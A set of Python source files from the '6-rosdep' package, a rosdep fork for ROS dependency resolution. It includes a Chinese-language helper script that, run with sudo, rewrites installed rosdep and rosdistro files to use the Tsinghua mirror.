return [x.url for x in self.sources]
def get_source(self, view_name):
matches = [x for x in self.sources if x.url == view_name]
if matches:
return matches[0]
else:
raise rospkg.ResourceNotFound(view_name)
def get_rosdeps(self, resource_name, implicit=True):
"""
Always raises as SourceListLoader defines no concrete resources with rosdeps.
:raises: :exc:`rospkg.ResourceNotFound`
"""
raise rospkg.ResourceNotFound(resource_name)
def get_view_key(self, resource_name):
"""
Always raises as SourceListLoader defines no concrete resources with rosdeps.
:returns: Name of view that *resource_name* is in, ``None`` if no associated view.
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be found.
"""
raise rospkg.ResourceNotFound(resource_name) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/sources_list.py | sources_list.py |
# Author Ken Conley/[email protected]
"""
Library for loading rosdep files from the ROS package/stack
filesystem.
"""
from __future__ import print_function
import os
import catkin_pkg.package
import rospkg
from .catkin_packages import VALID_DEPENDENCY_TYPES
from .loader import RosdepLoader
# Default view key is the view that packages that are not in stacks
# see. It is the root of all dependencies. It is superceded by an
# explicit underlay_key.
DEFAULT_VIEW_KEY = '*default*'
# Implementation details: this API was originally conceived under the
# rosdep 1 design. It has since been retrofitted for the rosdep 2
# design, which means it is a bit overbuilt. There really is no need
# for a notion of views for rospkg -- all rospkgs have the same view.
# It we be nice to refactor this API into something much, much
# simpler, which would probably involve merging RosPkgLoader and
# SourcesListLoader. RosPkgLoader would provide identification of
# resources and SourcesListLoader would build a *single* view that was
# no longer resource-dependent.
class RosPkgLoader(RosdepLoader):
def __init__(self, rospack=None, rosstack=None, underlay_key=None, dependency_types=[]):
"""
:param underlay_key: If set, all views loaded by this loader
will depend on this key.
"""
if rospack is None:
rospack = rospkg.RosPack()
if rosstack is None:
rosstack = rospkg.RosStack()
self._rospack = rospack
self._rosstack = rosstack
self._rosdep_yaml_cache = {}
self._underlay_key = underlay_key
# cache computed list of loadable resources
self._loadable_resource_cache = None
self._catkin_packages_cache = None
default_dep_types = VALID_DEPENDENCY_TYPES - {'doc'}
self.include_dep_types = VALID_DEPENDENCY_TYPES.intersection(set(dependency_types)) if dependency_types else default_dep_types
def load_view(self, view_name, rosdep_db, verbose=False):
"""
Load view data into *rosdep_db*. If the view has already
been loaded into *rosdep_db*, this method does nothing. If
view has no rosdep data, it will be initialized with an empty
data map.
:raises: :exc:`InvalidData` if view rosdep.yaml is invalid
:raises: :exc:`rospkg.ResourceNotFound` if view cannot be located
:returns: ``True`` if view was loaded. ``False`` if view
was already loaded.
"""
if rosdep_db.is_loaded(view_name):
return
if view_name not in self.get_loadable_views():
raise rospkg.ResourceNotFound(view_name)
elif view_name == 'invalid':
raise rospkg.ResourceNotFound('FOUND' + view_name + str(self.get_loadable_views()))
if verbose:
print('loading view [%s] with rospkg loader' % (view_name))
# chain into underlay if set
if self._underlay_key:
view_dependencies = [self._underlay_key]
else:
view_dependencies = []
# no rospkg view has actual data
rosdep_db.set_view_data(view_name, {}, view_dependencies, '<nodata>')
def get_loadable_views(self):
"""
'Views' map to ROS stack names.
"""
return list(self._rosstack.list()) + [DEFAULT_VIEW_KEY]
def get_loadable_resources(self):
"""
'Resources' map to ROS packages names.
"""
if not self._loadable_resource_cache:
self._loadable_resource_cache = list(self._rospack.list())
return self._loadable_resource_cache
def get_catkin_paths(self):
if not self._catkin_packages_cache:
def find_catkin_paths(src):
return map(lambda x: (x, src.get_path(x)),
filter(lambda x: src.get_manifest(x).is_catkin, src.list()))
self._catkin_packages_cache = dict(find_catkin_paths(self._rospack))
self._catkin_packages_cache.update(find_catkin_paths(self._rosstack))
return self._catkin_packages_cache
def get_rosdeps(self, resource_name, implicit=True):
"""
If *resource_name* is a stack, returns an empty list.
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be found.
"""
if resource_name in self.get_catkin_paths():
pkg = catkin_pkg.package.parse_package(self.get_catkin_paths()[resource_name])
pkg.evaluate_conditions(os.environ)
deps = sum((getattr(pkg, '{}_depends'.format(d)) for d in self.include_dep_types), [])
return [d.name for d in deps if d.evaluated_condition]
elif resource_name in self.get_loadable_resources():
rosdeps = set(self._rospack.get_rosdeps(resource_name, implicit=False))
if implicit:
# This resource is a manifest.xml, but it might depend on things with a package.xml
# Make sure they get a chance to evaluate conditions
for dep in self._rospack.get_depends(resource_name):
rosdeps = rosdeps.union(set(self.get_rosdeps(dep, implicit=True)))
return list(rosdeps)
elif resource_name in self._rosstack.list():
# stacks currently do not have rosdeps of their own, implicit or otherwise
return []
else:
raise rospkg.ResourceNotFound(resource_name)
def is_metapackage(self, resource_name):
if resource_name in self._rosstack.list():
m = self._rosstack.get_manifest(resource_name)
return m.is_catkin
return False
def get_view_key(self, resource_name):
"""
Map *resource_name* to a view key. In rospkg, this maps the
DEFAULT_VIEW_KEY if *resource_name* exists.
:raises: :exc:`rospkg.ResourceNotFound`
"""
if (
resource_name in self.get_catkin_paths() or
resource_name in self.get_loadable_resources()
):
return DEFAULT_VIEW_KEY
else:
raise rospkg.ResourceNotFound(resource_name) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/rospkg_loader.py | rospkg_loader.py |
import copy
import os
try:
import cPickle as pickle
except ImportError:
import pickle
try:
FileNotFoundError
except NameError:
# Python 2 compatibility
# https://stackoverflow.com/questions/21367320/
FileNotFoundError = IOError
import rospkg
from ._version import __version__
from .cache_tools import compute_filename_hash
from .cache_tools import write_cache_file
from .cache_tools import PICKLE_CACHE_EXT
"""
Rosdep needs to store data that isn't used to resolve rosdep keys, but needs to be cached during
`rosdep update`.
"""
META_CACHE_DIR = 'meta.cache'
def get_meta_cache_dir():
"""Return storage location for cached meta data."""
ros_home = rospkg.get_ros_home()
return os.path.join(ros_home, 'rosdep', META_CACHE_DIR)
class CacheWrapper(object):
"""Make it possible to introspect cache in case some future bug needs to be worked around."""
def __init__(self, category, data):
# The version of rosdep that wrote the category
self.rosdep_version = __version__
# The un-hashed name of the category
self.category_name = category
# The stuff being stored
self.data = data
@property
def data(self):
# If cached data type is mutable, don't allow modifications to what's been loaded
return copy.deepcopy(self.__data)
@data.setter
def data(self, value):
self.__data = copy.deepcopy(value)
class MetaDatabase:
"""
Store and retrieve metadata from rosdep cache.
This data is fetched during `rosdep update`, but is not a source for resolving rosdep keys.
"""
def __init__(self, cache_dir=None):
if cache_dir is None:
cache_dir = get_meta_cache_dir()
self._cache_dir = cache_dir
self._loaded = {}
def set(self, category, metadata):
"""Add or overwrite metadata in the cache."""
wrapper = CacheWrapper(category, metadata)
# print(category, metadata)
write_cache_file(self._cache_dir, category, wrapper)
self._loaded[category] = wrapper
def get(self, category, default=None):
"""Return metadata in the cache, or None if there is no cache entry."""
if category not in self._loaded:
self._load_from_cache(category, self._cache_dir)
if category in self._loaded:
return self._loaded[category].data
return default
def _load_from_cache(self, category, cache_dir):
filename = compute_filename_hash(category) + PICKLE_CACHE_EXT
try:
with open(os.path.join(self._cache_dir, filename), 'rb') as cache_file:
self._loaded[category] = pickle.loads(cache_file.read())
except FileNotFoundError:
pass | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/meta.py | meta.py |
# Author Ken Conley/[email protected]
"""
Underlying model of rosdep data. The basic data model of rosdep is to
store a dictionary of data indexed by view name (i.e. ROS stack name).
This data includes a dictionary mapping rosdep dependency names to
rules and the view dependencies.
This is a lower-level representation. Higher-level representation can
combine these rosdep dependency maps and view dependencies together
into a combined view on which queries can be made.
"""
class RosdepDatabaseEntry(object):
"""
Stores rosdep data and metadata for a single view.
"""
def __init__(self, rosdep_data, view_dependencies, origin):
"""
:param rosdep_data: raw rosdep dictionary map for view
:param view_dependencies: list of view dependency names
:param origin: name of where data originated, e.g. filename
"""
assert isinstance(rosdep_data, dict), 'RosdepDatabaseEntry() rosdep_data is not a dict: %s' % rosdep_data
self.rosdep_data = rosdep_data
self.view_dependencies = view_dependencies
self.origin = origin
class RosdepDatabase(object):
"""
Stores loaded rosdep data for multiple views.
"""
def __init__(self):
self._rosdep_db = {} # {view_name: RosdepDatabaseEntry}
def is_loaded(self, view_name):
"""
:param view_name: name of view to check, ``str``
:returns: ``True`` if *view_name* has been loaded into this
database.
"""
return view_name in self._rosdep_db
def mark_loaded(self, view_name):
"""
If view is not already loaded, this will mark it as such. This in effect sets the data for the view to be empty.
:param view_name: name of view to mark as loaded
"""
self.set_view_data(view_name, {}, [], None)
def set_view_data(self, view_name, rosdep_data, view_dependencies, origin):
"""
Set data associated with view. This will create a new
:class:`RosdepDatabaseEntry`.
:param rosdep_data: rosdep data map to associated with view.
This will be copied.
:param origin: origin of view data, e.g. filepath of ``rosdep.yaml``
"""
self._rosdep_db[view_name] = RosdepDatabaseEntry(rosdep_data.copy(), view_dependencies, origin)
def get_view_names(self):
"""
:returns: list of view names that are loaded into this database.
"""
return self._rosdep_db.keys()
def get_view_data(self, view_name):
"""
:returns: :class:`RosdepDatabaseEntry` of given view.
:raises: :exc:`KeyError` if no entry for *view_name*
"""
return self._rosdep_db[view_name]
def get_view_dependencies(self, view_name):
"""
:raises: :exc:`KeyError` if *view_name* is not an entry, or if
all of view's dependencies have not been properly loaded.
"""
entry = self.get_view_data(view_name)
dependencies = entry.view_dependencies[:]
# compute full set of dependencies by iterating over
# dependencies in reverse order and prepending.
for s in reversed(entry.view_dependencies):
dependencies = self.get_view_dependencies(s) + dependencies
# make unique preserving order
unique_deps = []
for d in dependencies:
if d not in unique_deps:
unique_deps.append(d)
return unique_deps | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/model.py | model.py |
# Author Tully Foote/[email protected], Ken Conley/[email protected]
"""
rosdep library and command-line tool
"""
from __future__ import print_function
from ._version import __version__
import sys
from .installers import InstallerContext, Installer, \
PackageManagerInstaller
from .core import RosdepInternalError, InstallFailed, UnsupportedOs, \
InvalidData, DownloadFailure
from .model import RosdepDatabase, RosdepDatabaseEntry
from .lookup import RosdepDefinition, RosdepView, RosdepLookup, \
ResolutionError
from .loader import RosdepLoader
# don't let import error take down code as when attempting to compute version number
try:
from .rospkg_loader import RosPkgLoader
except ImportError:
print('Cannot import rospkg, rosdep will not function properly',
file=sys.stderr)
def create_default_installer_context(verbose=False):
from .platforms import alpine
from .platforms import arch
from .platforms import cygwin
from .platforms import debian
from .platforms import gentoo
from .platforms import nix
from .platforms import openembedded
from .platforms import opensuse
from .platforms import osx
from .platforms import pip
from .platforms import npm
from .platforms import gem
from .platforms import redhat
from .platforms import freebsd
from .platforms import slackware
from .platforms import source
platform_mods = [alpine, arch, cygwin, debian, gentoo, nix, openembedded, opensuse, osx, redhat, slackware, freebsd]
installer_mods = [source, pip, gem, npm] + platform_mods
context = InstallerContext()
context.set_verbose(verbose)
# setup installers
for m in installer_mods:
if verbose:
print('registering installers for %s' % (m.__name__))
m.register_installers(context)
# setup platforms
for m in platform_mods:
if verbose:
print('registering platforms for %s' % (m.__name__))
m.register_platforms(context)
return context
from . import gbpdistro_support # noqa
gbpdistro_support.create_default_installer_context = create_default_installer_context
# TODO: this was partially abstracted from main() for another library,
# but it turned out to be unnecessary. Not sure it's worth maintaining
# separately, especially in the top-level module.
def get_default_installer(installer_context=None, verbose=False):
"""
Based on the active OS and installer context configuration, get
the installer to use and the necessary configuration state
(installer keys, OS name/version).
:returns: installer, installer_keys, default_key, os_name, os_version.
"""
if installer_context is None:
installer_context = create_default_installer_context(verbose=verbose)
os_name, os_version = installer_context.get_os_name_and_version()
try:
installer_keys = installer_context.get_os_installer_keys(os_name)
default_key = installer_context.get_default_os_installer_key(os_name)
except KeyError:
raise UnsupportedOs(os_name, installer_context.get_os_keys())
installer = installer_context.get_installer(default_key)
return installer, installer_keys, default_key, os_name, os_version
__all__ = [
'InstallerContext', 'Installer', 'PackageManagerInstaller',
'RosdepInternalError', 'InstallFailed', 'UnsupportedOs', 'InvalidData',
'DownloadFailure',
'RosdepDatabase', 'RosdepDatabaseEntry',
'RosdepDefinition', 'RosdepView', 'RosdepLookup', 'ResolutionError',
'RosdepLoader', 'RosPkgLoader',
'get_default_installer',
'create_default_installer_context',
] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/__init__.py | __init__.py |
# Author William Woodall/[email protected]
from collections import defaultdict
class Resolution(dict):
"""A default dictionary for use in the :class:`DependencyGraph`."""
def __init__(self):
super(Resolution, self).__init__()
self['installer_key'] = None
self['install_keys'] = []
self['dependencies'] = []
self['is_root'] = True
class DependencyGraph(defaultdict):
"""
Provides a mechanism for generating a list of resolutions which preserves the dependency order.
The :class:`DependencyGraph` inherits from a *defaultdict*, so it can be used as such to load
the dependency graph data into it.
Example::
# Dependency graph:: A-B-C
dg = DependencyGraph()
dg['A']['installer_key'] = 'a_installer'
dg['A']['install_keys'] = ['a']
dg['A']['dependencies'] = ['B']
dg['B']['installer_key'] = 'b_installer'
dg['B']['install_keys'] = ['b']
dg['B']['dependencies'] = ['C']
dg['C']['installer_key'] = 'c_installer'
dg['C']['install_keys'] = ['c']
dg['C']['dependencies'] = []
result = dg.get_ordered_uninstalled()
"""
def __init__(self):
defaultdict.__init__(self, Resolution)
def detect_cycles(self, rosdep_key, traveled_keys):
"""
Recursive function to detect cycles in the dependency graph.
:param rosdep_key: This is the rosdep key to use as the root in the cycle exploration.
:param traveled_keys: A list of rosdep_keys that have been traversed thus far.
:raises: :exc:`AssertionError` if the rosdep_key is in the traveled keys, indicating a cycle has occurred.
"""
assert rosdep_key not in traveled_keys, 'A cycle in the dependency graph occurred with key `%s`.' % rosdep_key
traveled_keys.append(rosdep_key)
for dependency in self[rosdep_key]['dependencies']:
self.detect_cycles(dependency, traveled_keys)
def validate(self):
"""
Performs validations on the dependency graph, like cycle detection and invalid rosdep key detection.
:raises: :exc:`AssertionError` if a cycle is detected.
:raises: :exc:`KeyError` if an invalid rosdep_key is found in the dependency graph.
"""
for rosdep_key in self:
# Ensure all dependencies have definitions
# i.e.: Ensure we aren't pointing to invalid rosdep keys
for dependency in self[rosdep_key]['dependencies']:
if dependency not in self:
raise KeyError(
'Invalid Graph Structure: rosdep key `%s` does not exist in the dictionary of resolutions.'
% dependency)
self[dependency]['is_root'] = False
# Check each entry for cyclical dependencies
for rosdep_key in self:
self.detect_cycles(rosdep_key, [])
def get_ordered_dependency_list(self):
"""
Generates an ordered list of dependencies using the dependency graph.
:returns: *[(installer_key, [install_keys])]*, ``[(str, [str])]``. *installer_key* is the key
that denotes which installed the accompanying *install_keys* are for. *installer_key* are something
like ``apt`` or ``homebrew``. *install_keys* are something like ``boost`` or ``ros-fuerte-ros_comm``.
:raises: :exc:`AssertionError` if a cycle is detected.
:raises: :exc:`KeyError` if an invalid rosdep_key is found in the dependency graph.
"""
# Validate the graph
self.validate()
# Generate the dependency list
dep_list = []
for rosdep_key in self:
if self[rosdep_key]['is_root']:
dep_list.extend(self.__get_ordered_uninstalled(rosdep_key))
# Make the list unique and remove empty entries
result = []
for item in dep_list:
if item not in result and item[1] != []:
result.append(item)
# Squash the results by installer_key
squashed_result = []
previous_installer_key = None
for installer_key, resolved in result:
if previous_installer_key != installer_key:
squashed_result.append((installer_key, []))
previous_installer_key = installer_key
squashed_result[-1][1].extend(resolved)
return squashed_result
def __get_ordered_uninstalled(self, key):
uninstalled = []
for dependency in self[key]['dependencies']:
uninstalled.extend(self.__get_ordered_uninstalled(dependency))
uninstalled.append((self[key]['installer_key'], self[key]['install_keys']))
return uninstalled | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/dependency_graph.py | dependency_graph.py |
import os
import sys
def fix_uri( file ):
print('打开文件:'+ file)
try:
src_file = open(file, 'r')
except IOError:
print('\n【!】列阵失败……请确认是否指令前加了 sudo ? \n---------------------\n正确指令:\nsudo pip install 6-rosdep\nsudo 6-rosdep\n---------------------\n')
return False
else:
if src_file:
print('将 rosdep 修改为国内的资源~')
contents = src_file.read()
# 备份数据
backup_exists = os.path.exists(file + '.bak')
if backup_exists is False:
backup_file = open(file + '.bak', 'w')
backup_file.write(contents)
backup_file.close()
# 替换内容
src_file.close()
src_file = open(file, 'w')
#new_contents = contents.replace("raw.githubusercontent.com/ros/rosdistro","gitee.com/fuckrosdep/rosdistro/raw")
new_contents = contents.replace("raw.githubusercontent.com/ros/rosdistro","https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro")
new_contents2 = new_contents.replace("gitee.com/fuckrosdep/rosdistro/raw","https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro")
#print(new_contents)
src_file.write(new_contents2)
src_file.close()
return True
def fix_uri2( file ):
print('打开文件:'+ file)
try:
src_file = open(file, 'r')
except IOError:
print('\n【!】列阵失败……请确认是否指令前加了 sudo ? \n---------------------\n正确指令:\nsudo pip install 6-rosdep\nsudo 6-rosdep\n---------------------\n')
return False
else:
if src_file:
print('将 rosdep 修改为国内的资源~')
contents = src_file.read()
# 备份数据
backup_exists = os.path.exists(file + '.bak')
if backup_exists is False:
backup_file = open(file + '.bak', 'w')
backup_file.write(contents)
backup_file.close()
# 替换内容
src_file.close()
src_file = open(file, 'w')
#new_contents = contents.replace("raw.githubusercontent.com/ros/rosdistro","gitee.com/fuckrosdep/rosdistro/raw")
new_contents = contents.replace("raw.githubusercontent.com/ros/rosdistro","https://mirrors.tuna.tsinghua.edu.cn/rosdistro")
new_contents2 = new_contents.replace("gitee.com/fuckrosdep/rosdistro/raw","https://mirrors.tuna.tsinghua.edu.cn/rosdistro")
#print(new_contents)
src_file.write(new_contents2)
src_file.close()
return True
def main(args=None):
print("--------------------------------------------------------------------------------")
print("感谢赵虚左老师提供的解题思路。感谢鱼香ROS大佬的引导启发。\n愿天下道友再无 rosdep 之烦恼~\n欢迎加QQ群【869643967】")
print("--------------------------------------------------------------------------------")
file_1 = '/usr/lib/python2.7/dist-packages/rosdistro/__init__.py'
file_2 = '/usr/lib/python2.7/dist-packages/rosdep2/gbpdistro_support.py'
file_3 = '/usr/lib/python2.7/dist-packages/rosdep2/rep3.py'
file_4 = '/usr/lib/python2.7/dist-packages/rosdep2/sources_list.py'
file_5 = '/usr/lib/python3/dist-packages/rosdistro/__init__.py'
file_6 = '/usr/lib/python3/dist-packages/rosdep2/gbpdistro_support.py'
file_7 = '/usr/lib/python3/dist-packages/rosdep2/rep3.py'
file_8 = '/usr/lib/python3/dist-packages/rosdep2/sources_list.py'
#melodic / Ubuntu 18.04
try:
file_1_exists = os.path.exists(file_1)
finally:
if file_1_exists:
print('\n检测到是 Melodic 或之前的版本 (Ubuntu 18.04或更早),准备列阵……\n')
res = fix_uri2(file_1)
if res is False:
sys.exit(1)
res = fix_uri(file_2)
if res is False:
sys.exit(1)
res = fix_uri(file_3)
if res is False:
sys.exit(1)
res = fix_uri(file_4)
if res is False:
sys.exit(1)
#noetic / Ubuntu 20.04
try:
file_5_exists = os.path.exists(file_5)
finally:
if file_5_exists:
print('检测到是 Noetic 版本 (Ubuntu 20.04),准备列阵……\n')
res = fix_uri2(file_5)
if res is False:
sys.exit(1)
res = fix_uri(file_6)
if res is False:
sys.exit(1)
res = fix_uri(file_7)
if res is False:
sys.exit(1)
res = fix_uri(file_8)
#complete
file_list = "/etc/ros/rosdep/sources.list.d/20-default.list"
file_list_exists = os.path.exists(file_list)
if file_list_exists:
print('移除旧文件:'+ file_list + '\n\n')
os.remove(file_list)
print("--------------------------------------------------------------------------------")
print('\n若遇到任何问题,欢迎进入微信公众号【六部工坊】进行反馈,我们会及时为道友解忧~\n更多精彩 ROS 教学视频,请关注B站频道【六部工坊】 \n')
print("--------------------------------------------------------------------------------")
print('列阵完毕~道友可运行如下指令开始渡劫……\n \nsudo rosdep init \nrosdep update \n') | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/hello/main.py | main.py |
from __future__ import print_function
import os
import subprocess
from ..core import InstallFailed
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# npm package manager key
NPM_INSTALLER = 'npm'
def register_installers(context):
context.set_installer(NPM_INSTALLER, NpmInstaller())
def is_npm_installed():
try:
subprocess.Popen(['npm'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
return True
except OSError:
return False
class NpmInstaller(PackageManagerInstaller):
"""
:class:`Installer` support for npm.
"""
def __init__(self):
super(NpmInstaller, self).__init__(self.npm_detect, supports_depends=True)
def npm_detect(self, pkgs, exec_fn=None):
"""
Given a list of package, return the list of installed packages.
:param exec_fn: function to execute Popen and read stdout (for testing)
"""
if exec_fn is None:
exec_fn = read_stdout
# npm list -parseable returns [dir, dir/node_modules/path, dir/node_modules/path, ...]
if self.as_root:
cmd = ['npm', 'list', '-g']
else:
cmd = ['npm', 'list']
pkg_list = exec_fn(cmd + ['-parseable']).split('\n')
ret_list = []
for pkg in pkg_list[1:]:
pkg_row = pkg.split('/')
if pkg_row[-1] in pkgs:
ret_list.append(pkg_row[-1])
return ret_list
def get_version_strings(self):
npm_version = subprocess.check_output(['npm', '--version']).strip().decode()
return ['npm {}'.format(npm_version)]
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
if not is_npm_installed():
raise InstallFailed((NPM_INSTALLER, 'npm is not installed'))
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
if self.as_root:
cmd = ['npm', 'install', '-g']
else:
cmd = ['npm', 'install']
return [self.elevate_priv(cmd + [p]) for p in packages] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/npm.py | npm.py |
# Author Tully Foote, Ken Conley
from __future__ import print_function
import subprocess
import sys
from rospkg.os_detect import (
OS_DEBIAN,
OS_LINARO,
OS_UBUNTU,
OS_ELEMENTARY,
OS_MX,
OS_POP,
OS_ZORIN,
OsDetect,
read_os_release
)
from .pip import PIP_INSTALLER
from .gem import GEM_INSTALLER
from .npm import NPM_INSTALLER
from .source import SOURCE_INSTALLER
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# apt package manager key
APT_INSTALLER = 'apt'
def register_installers(context):
context.set_installer(APT_INSTALLER, AptInstaller())
def register_platforms(context):
register_debian(context)
register_ubuntu(context)
# Aliases
register_elementary(context)
register_linaro(context)
register_mx(context)
register_pop(context)
register_zorin(context)
def register_debian(context):
context.add_os_installer_key(OS_DEBIAN, APT_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, PIP_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, GEM_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, NPM_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_DEBIAN, lambda self: APT_INSTALLER)
context.set_os_version_type(OS_DEBIAN, OsDetect.get_codename)
def register_linaro(context):
# Linaro is an alias for Ubuntu. If linaro is detected and it's not set as
# an override force ubuntu.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_LINARO and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_LINARO, OS_UBUNTU), file=sys.stderr)
context.set_os_override(OS_UBUNTU, context.os_detect.get_codename())
def register_elementary(context):
# Elementary is an alias for Ubuntu. If elementary is detected and it's
# not set as an override force ubuntu.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_ELEMENTARY and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_ELEMENTARY, OS_UBUNTU), file=sys.stderr)
context.set_os_override(OS_UBUNTU, context.os_detect.get_codename())
def register_mx(context):
# MX is an alias for Debian. If MX is detected and it's
# not set as an override, force Debian.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_MX and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_MX, OS_DEBIAN), file=sys.stderr)
release_info = read_os_release()
version = read_os_release()["VERSION"]
context.set_os_override(OS_DEBIAN, version[version.find("(") + 1:version.find(")")])
def register_pop(context):
# Pop! OS is an alias for Ubuntu. If Pop! is detected and it's
# not set as an override force ubuntu.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_POP and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_POP, OS_UBUNTU), file=sys.stderr)
context.set_os_override(OS_UBUNTU, context.os_detect.get_codename())
def register_zorin(context):
# Zorin is an alias for Ubuntu. If Zorin is detected and it's
# not set as an override force ubuntu.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_ZORIN and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_ZORIN, OS_UBUNTU), file=sys.stderr)
context.set_os_override(OS_UBUNTU, context.os_detect.get_codename())
def register_ubuntu(context):
context.add_os_installer_key(OS_UBUNTU, APT_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, PIP_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, GEM_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, NPM_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_UBUNTU, lambda self: APT_INSTALLER)
context.set_os_version_type(OS_UBUNTU, OsDetect.get_codename)
def _read_apt_cache_showpkg(packages, exec_fn=None):
"""
Output whether these packages are virtual package list providing package.
If one package was not found, it gets returned as non-virtual.
:param exec_fn: see `dpkg_detect`; make sure that exec_fn supports a
second, boolean, parameter.
"""
cmd = ['apt-cache', 'showpkg'] + packages
if exec_fn is None:
exec_fn = read_stdout
std_out = exec_fn(cmd).splitlines()
starts = []
notfound = set()
for p in packages:
last_start = starts[-1] if len(starts) > 0 else 0
try:
starts.append(std_out.index('Package: %s' % p, last_start))
except ValueError:
notfound.add(p)
starts.append(None)
for p in packages:
if p in notfound:
yield p, False, None
continue
start = starts.pop(0)
lines = iter(std_out[start:starts[0]])
header = 'Package: %s' % p
# proceed to Package header
try:
while next(lines) != header:
pass
except StopIteration:
pass
# proceed to versions section
try:
while next(lines) != 'Versions: ':
pass
except StopIteration:
pass
# virtual packages don't have versions
try:
if next(lines) != '':
yield p, False, None
continue
except StopIteration:
break
# proceed to reserve provides section
try:
while next(lines) != 'Reverse Provides: ':
pass
except StopIteration:
pass
pr = [line.split(' ', 2)[0] for line in lines]
if pr:
yield p, True, pr
else:
yield p, False, None
def dpkg_detect(pkgs, exec_fn=None):
"""
Given a list of package, return the list of installed packages.
:param pkgs: list of package names, optionally followed by a fixed version (`foo=3.0`)
:param exec_fn: function to execute Popen and read stdout (for testing)
:return: list elements in *pkgs* that were found installed on the system
"""
ret_list = []
# this is mainly a hack to support version locking for eigen.
# we strip version-locking syntax, e.g. libeigen3-dev=3.0.1-*.
# our query does not do the validation on the version itself.
# This is a map `package name -> package name optionally with version`.
version_lock_map = {}
for p in pkgs:
if '=' in p:
version_lock_map[p.split('=')[0]] = p
else:
version_lock_map[p] = p
cmd = ['dpkg-query', '-W', '-f=\'${Package} ${Status}\n\'']
cmd.extend(version_lock_map.keys())
if exec_fn is None:
exec_fn = read_stdout
std_out, std_err = exec_fn(cmd, True)
std_out = std_out.replace('\'', '')
pkg_list = std_out.split('\n')
for pkg in pkg_list:
pkg_row = pkg.split()
if len(pkg_row) == 4 and (pkg_row[3] == 'installed'):
ret_list.append(pkg_row[0])
installed_packages = [version_lock_map[r] for r in ret_list]
# now for the remaining packages check, whether they are installed as
# virtual packages
remaining = _read_apt_cache_showpkg(list(p for p in pkgs if p not in installed_packages))
virtual = [n for (n, v, pr) in remaining if v and len(dpkg_detect(pr)) > 0]
return installed_packages + virtual
def _iterate_packages(packages, reinstall):
for entry in _read_apt_cache_showpkg(packages):
p, is_virtual, providers = entry
if is_virtual:
installed = []
if reinstall:
installed = dpkg_detect(providers)
if len(installed) > 0:
for i in installed:
yield i
continue # don't ouput providers
yield providers
else:
yield p
class AptInstaller(PackageManagerInstaller):
"""
An implementation of the Installer for use on debian style
systems.
"""
def __init__(self):
super(AptInstaller, self).__init__(dpkg_detect)
def get_version_strings(self):
output = subprocess.check_output(['apt-get', '--version'])
version = output.splitlines()[0].split(b' ')[1].decode()
return ['apt-get {}'.format(version)]
def _get_install_commands_for_package(self, base_cmd, package_or_list):
def pkg_command(p):
return self.elevate_priv(base_cmd + [p])
if isinstance(package_or_list, list):
return [pkg_command(p) for p in package_or_list]
else:
return pkg_command(package_or_list)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
base_cmd = ['apt-get', 'install']
if not interactive:
base_cmd.append('-y')
if quiet:
base_cmd.append('-qq')
return [self._get_install_commands_for_package(base_cmd, p) for p in _iterate_packages(packages, reinstall)] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/debian.py | debian.py |
# Author Tully Foote/[email protected]
from __future__ import print_function
import subprocess
import sys
from rospkg.os_detect import (
OS_ALMALINUX,
OS_CENTOS,
OS_FEDORA,
OS_ORACLE,
OS_RHEL,
OS_ROCKY
)
from .pip import PIP_INSTALLER
from .source import SOURCE_INSTALLER
from ..core import rd_debug
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# dnf package manager key
DNF_INSTALLER = 'dnf'
# yum package manager key
YUM_INSTALLER = 'yum'
def register_installers(context):
context.set_installer(DNF_INSTALLER, DnfInstaller())
context.set_installer(YUM_INSTALLER, YumInstaller())
def register_platforms(context):
register_fedora(context)
register_rhel(context)
# Aliases
register_rhel_clone(context, OS_ALMALINUX)
register_rhel_clone(context, OS_CENTOS)
register_rhel_clone(context, OS_ORACLE)
register_rhel_clone(context, OS_ROCKY)
def register_fedora(context):
context.add_os_installer_key(OS_FEDORA, PIP_INSTALLER)
context.add_os_installer_key(OS_FEDORA, DNF_INSTALLER)
